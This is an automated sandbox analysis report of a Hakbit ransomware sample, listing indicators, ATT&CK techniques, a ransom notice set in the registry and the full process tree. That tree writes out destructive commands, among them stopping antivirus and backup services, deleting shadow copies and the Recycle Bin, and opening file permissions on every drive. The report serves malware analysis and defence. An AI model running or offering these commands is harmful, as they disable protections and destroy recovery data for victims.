hakbit | e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62

Resubmissions

17-11-2020 12:01

201117-yzjn4s5cdn 10

18-06-2020 04:28

200618-tg948yvz5n 10

Analysis

max time kernel
1800s
max time network
1733s
platform
windows7_x64
resource
win7v20201028
submitted
17-11-2020 12:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

System.exe
Size

66KB
MD5

8d6ab03994b0ce3466873aa7532fe76b
SHA1

156aecd4d8e65d205181ad5eace466c8798d3c86
SHA256

e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62
SHA512

2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c

Score

10^/10

hakbit discovery persistence ransomware spyware

Malware Config

Signatures

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Deletes itself 1 IoCs

pid	Process
2336	cmd.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	System.exe

Modifies file permissions 1 TTPs 29 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
300	icacls.exe
2352	icacls.exe
2512	icacls.exe
2576	icacls.exe
2716	icacls.exe
2480	icacls.exe
1748	icacls.exe
924	icacls.exe
1152	icacls.exe
2832	icacls.exe
2888	icacls.exe
2544	icacls.exe
2608	icacls.exe
1504	icacls.exe
1204	icacls.exe
2224	icacls.exe
2256	icacls.exe
1716	icacls.exe
2128	icacls.exe
2288	icacls.exe
2416	icacls.exe
2096	icacls.exe
2192	icacls.exe
2320	icacls.exe
2448	icacls.exe
1340	icacls.exe
2064	icacls.exe
2160	icacls.exe
2384	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	System.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "\r\n* ATTENTION *\r\nYour File Locked By \"Military Algorithm\" And Wiped. \r\nFor Recovery Your Files Contact : [email protected]"	System.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1216	vssadmin.exe
1424	vssadmin.exe
1168	vssadmin.exe
2032	vssadmin.exe
232	vssadmin.exe
1784	vssadmin.exe
304	vssadmin.exe
1720	vssadmin.exe
1980	vssadmin.exe
1928	vssadmin.exe
1764	vssadmin.exe
1736	vssadmin.exe
1412	vssadmin.exe
228	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1144	taskkill.exe
1896	taskkill.exe
1888	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2132	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2200	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2752	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	344	System.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	1888	taskkill.exe
Token: SeBackupPrivilege	268	vssvc.exe
Token: SeRestorePrivilege	268	vssvc.exe
Token: SeAuditPrivilege	268	vssvc.exe
Token: SeDebugPrivilege	2752	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
344	System.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
344	System.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe
2752	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 344 wrote to memory of 1920	344	System.exe	26
PID 344 wrote to memory of 1920	344	System.exe	26
PID 344 wrote to memory of 1920	344	System.exe	26
PID 1920 wrote to memory of 2004	1920	net.exe	28
PID 1920 wrote to memory of 2004	1920	net.exe	28
PID 1920 wrote to memory of 2004	1920	net.exe	28
PID 344 wrote to memory of 1436	344	System.exe	29
PID 344 wrote to memory of 1436	344	System.exe	29
PID 344 wrote to memory of 1436	344	System.exe	29
PID 1436 wrote to memory of 1784	1436	net.exe	31
PID 1436 wrote to memory of 1784	1436	net.exe	31
PID 1436 wrote to memory of 1784	1436	net.exe	31
PID 344 wrote to memory of 1768	344	System.exe	32
PID 344 wrote to memory of 1768	344	System.exe	32
PID 344 wrote to memory of 1768	344	System.exe	32
PID 1768 wrote to memory of 1704	1768	net.exe	34
PID 1768 wrote to memory of 1704	1768	net.exe	34
PID 1768 wrote to memory of 1704	1768	net.exe	34
PID 344 wrote to memory of 1760	344	System.exe	36
PID 344 wrote to memory of 1760	344	System.exe	36
PID 344 wrote to memory of 1760	344	System.exe	36
PID 1760 wrote to memory of 1248	1760	net.exe	38
PID 1760 wrote to memory of 1248	1760	net.exe	38
PID 1760 wrote to memory of 1248	1760	net.exe	38
PID 344 wrote to memory of 1252	344	System.exe	39
PID 344 wrote to memory of 1252	344	System.exe	39
PID 344 wrote to memory of 1252	344	System.exe	39
PID 1252 wrote to memory of 316	1252	net.exe	41
PID 1252 wrote to memory of 316	1252	net.exe	41
PID 1252 wrote to memory of 316	1252	net.exe	41
PID 344 wrote to memory of 1336	344	System.exe	42
PID 344 wrote to memory of 1336	344	System.exe	42
PID 344 wrote to memory of 1336	344	System.exe	42
PID 1336 wrote to memory of 1744	1336	net.exe	44
PID 1336 wrote to memory of 1744	1336	net.exe	44
PID 1336 wrote to memory of 1744	1336	net.exe	44
PID 344 wrote to memory of 596	344	System.exe	45
PID 344 wrote to memory of 596	344	System.exe	45
PID 344 wrote to memory of 596	344	System.exe	45
PID 596 wrote to memory of 268	596	net.exe	47
PID 596 wrote to memory of 268	596	net.exe	47
PID 596 wrote to memory of 268	596	net.exe	47
PID 344 wrote to memory of 1460	344	System.exe	48
PID 344 wrote to memory of 1460	344	System.exe	48
PID 344 wrote to memory of 1460	344	System.exe	48
PID 1460 wrote to memory of 528	1460	net.exe	50
PID 1460 wrote to memory of 528	1460	net.exe	50
PID 1460 wrote to memory of 528	1460	net.exe	50
PID 344 wrote to memory of 1008	344	System.exe	51
PID 344 wrote to memory of 1008	344	System.exe	51
PID 344 wrote to memory of 1008	344	System.exe	51
PID 1008 wrote to memory of 1104	1008	net.exe	53
PID 1008 wrote to memory of 1104	1008	net.exe	53
PID 1008 wrote to memory of 1104	1008	net.exe	53
PID 344 wrote to memory of 968	344	System.exe	54
PID 344 wrote to memory of 968	344	System.exe	54
PID 344 wrote to memory of 968	344	System.exe	54
PID 968 wrote to memory of 112	968	net.exe	56
PID 968 wrote to memory of 112	968	net.exe	56
PID 968 wrote to memory of 112	968	net.exe	56
PID 344 wrote to memory of 1572	344	System.exe	57
PID 344 wrote to memory of 1572	344	System.exe	57
PID 344 wrote to memory of 1572	344	System.exe	57
PID 1572 wrote to memory of 668	1572	net.exe	59

C:\Users\Admin\AppData\Local\Temp\System.exe
"C:\Users\Admin\AppData\Local\Temp\System.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:344
- C:\Windows\system32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:2004
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:1784
- C:\Windows\system32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:1704
- C:\Windows\system32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:1248
- C:\Windows\system32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:316
- C:\Windows\system32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:1744
- C:\Windows\system32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:268
- C:\Windows\system32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:528
- C:\Windows\system32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:1104
- C:\Windows\system32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:112
- C:\Windows\system32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:668
- C:\Windows\system32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:432
- C:\Windows\system32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:1528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:1584
- C:\Windows\system32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:1712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:2032
- C:\Windows\system32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:1992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:1884
- C:\Windows\system32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:1728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:1736
- C:\Windows\system32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:1372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:1152
- C:\Windows\system32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:1220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:1516
- C:\Windows\system32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:988
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:1012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:568
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:684
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:1348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:844
- C:\Windows\system32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:2044
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:1588
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:1532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:2008
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:1488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:1884
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:1704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:1792
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:1420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:1248
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:1604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:1500
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:548
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:1104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:1476
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:1204
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:1588
- C:\Windows\system32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:1828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:1908
- C:\Windows\system32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:1064
- C:\Windows\system32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:1776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:1764
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:916
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1744
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:392
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:472
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1896
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1888
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1736
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2032
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1216
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:304
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:232
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1412
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1424
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:228
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1980
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1168
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1928
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1784
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1720
- C:\Windows\system32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1764
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:216
- C:\Windows\system32\icacls.exe
  "icacls.exe" A:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1340
- C:\Windows\system32\icacls.exe
  "icacls.exe" B:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1748
- C:\Windows\system32\icacls.exe
  "icacls.exe" D:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1504
- C:\Windows\system32\icacls.exe
  "icacls.exe" E:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1204
- C:\Windows\system32\icacls.exe
  "icacls.exe" F:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:924
- C:\Windows\system32\icacls.exe
  "icacls.exe" G:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:300
- C:\Windows\system32\icacls.exe
  "icacls.exe" H:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1716
- C:\Windows\system32\icacls.exe
  "icacls.exe" I:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1152
- C:\Windows\system32\icacls.exe
  "icacls.exe" J:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2064
- C:\Windows\system32\icacls.exe
  "icacls.exe" K:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2096
- C:\Windows\system32\icacls.exe
  "icacls.exe" L:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2128
- C:\Windows\system32\icacls.exe
  "icacls.exe" M:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2160
- C:\Windows\system32\icacls.exe
  "icacls.exe" N:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2192
- C:\Windows\system32\icacls.exe
  "icacls.exe" O:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2224
- C:\Windows\system32\icacls.exe
  "icacls.exe" P:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2256
- C:\Windows\system32\icacls.exe
  "icacls.exe" Q:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2288
- C:\Windows\system32\icacls.exe
  "icacls.exe" R:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2320
- C:\Windows\system32\icacls.exe
  "icacls.exe" S:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2352
- C:\Windows\system32\icacls.exe
  "icacls.exe" T:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2384
- C:\Windows\system32\icacls.exe
  "icacls.exe" U:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2416
- C:\Windows\system32\icacls.exe
  "icacls.exe" V:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2448
- C:\Windows\system32\icacls.exe
  "icacls.exe" W:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2480
- C:\Windows\system32\icacls.exe
  "icacls.exe" X:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2512
- C:\Windows\system32\icacls.exe
  "icacls.exe" Y:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2544
- C:\Windows\system32\icacls.exe
  "icacls.exe" Z:\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2608
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2716
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2832
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2888
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
